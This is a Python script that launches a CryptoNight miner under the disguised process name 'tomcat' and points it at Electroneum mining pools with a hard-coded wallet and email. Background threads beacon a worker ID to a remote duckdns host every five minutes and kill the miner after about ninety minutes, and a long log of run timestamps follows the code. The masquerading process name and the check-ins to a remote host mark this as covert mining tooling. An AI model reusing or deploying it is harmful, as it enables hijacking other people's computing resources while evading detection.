import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:31:05.771297
#2018-02-17 16:17:01.435121
#2018-02-17 18:04:06.183408
#2018-02-17 19:51:01.803263
#2018-02-17 21:38:05.287284
#2018-02-17 23:22:05.951069
#2018-02-18 01:09:06.255910
#2018-02-18 02:57:06.710642
#2018-02-18 04:47:01.784098
#2018-02-18 06:39:03.894867
#2018-02-18 08:28:01.707335
#2018-02-18 10:15:07.667014
#2018-02-18 12:01:06.043052
#2018-02-18 13:46:04.290046
#2018-02-18 15:37:03.909163
#2018-02-18 17:26:04.294146
#2018-02-18 19:14:05.051175
#2018-02-18 21:00:08.111764
#2018-02-18 22:46:04.991944
#2018-02-19 00:35:07.722209
#2018-02-19 02:21:05.717934
#2018-02-19 04:08:05.080550
#2018-02-19 05:52:01.330675
#2018-02-19 07:42:07.274344
#2018-02-19 09:31:04.041689
#2018-02-19 11:21:08.078905
#2018-02-19 13:07:06.518654
#2018-02-19 14:55:07.947194
#2018-02-19 16:42:07.428811
#2018-02-19 18:31:07.749281
#2018-02-19 20:18:03.979886
#2018-02-19 22:07:01.278033
#2018-02-19 23:52:05.262574
#2018-02-20 01:39:07.577288
#2018-02-20 03:27:06.299033
#2018-02-20 05:14:04.444586
#2018-02-20 06:56:03.686585
#2018-02-20 08:42:06.750974
#2018-02-20 10:26:03.775079
#2018-02-20 12:11:07.813643
#2018-02-20 13:59:04.776251
#2018-02-20 15:43:11.159041
#2018-02-20 17:28:07.485631
#2018-02-20 19:16:01.576578
#2018-02-20 21:04:06.296668
#2018-02-20 22:50:07.970928
#2018-02-21 00:35:01.801072
#2018-02-21 02:21:08.466729
#2018-02-21 04:08:03.244490
#2018-02-21 05:54:07.604136
#2018-02-21 07:42:08.843914
#2018-02-21 09:27:02.196210
#2018-02-21 11:16:04.242330
#2018-02-21 13:03:09.536189
#2018-02-21 14:50:09.771250
#2018-02-21 16:37:06.291213
#2018-02-21 18:28:05.895740
#2018-02-21 20:15:05.243270
#2018-02-21 22:02:04.588916
#2018-02-21 23:48:07.766108
#2018-02-22 01:40:07.950769
#2018-02-22 03:28:04.566016
#2018-02-22 05:15:04.292312
#2018-02-22 06:59:04.083697
#2018-02-22 08:47:07.191563
#2018-02-22 10:34:06.665949
#2018-02-22 12:21:02.047180
#2018-02-22 14:04:05.522659
#2018-02-22 15:51:04.300301
#2018-02-22 17:38:09.233746
#2018-02-22 19:26:04.632503
#2018-02-22 21:17:08.067802
#2018-02-22 23:02:09.195255
#2018-02-23 00:48:07.761685
#2018-02-23 02:36:01.889594
#2018-02-23 04:23:01.699992
#2018-02-23 06:08:07.117637
#2018-02-23 07:54:04.019075
#2018-02-23 10:10:06.973500
#2018-02-23 12:04:09.634041
#2018-02-23 13:53:01.483162
#2018-02-23 15:46:05.677246
#2018-02-23 17:33:06.323185
#2018-02-23 19:21:07.712505
#2018-02-23 21:04:04.557509
#2018-02-23 22:48:01.692426
#2018-02-24 00:36:08.448669
#2018-02-24 02:26:05.920021
#2018-02-24 04:16:07.197787
#2018-02-24 06:04:01.942890
#2018-02-24 07:51:06.458753
#2018-02-24 09:35:05.286105
#2018-02-24 11:28:05.569947
#2018-02-24 13:17:04.269637
#2018-02-24 15:08:07.581740
#2018-02-24 16:57:01.542906
#2018-02-24 18:44:05.470318
#2018-02-24 20:35:06.767912
#2018-02-24 22:39:01.996923
#2018-02-25 01:46:05.932180
#2018-02-25 05:10:04.080928
#2018-02-25 10:47:01.887198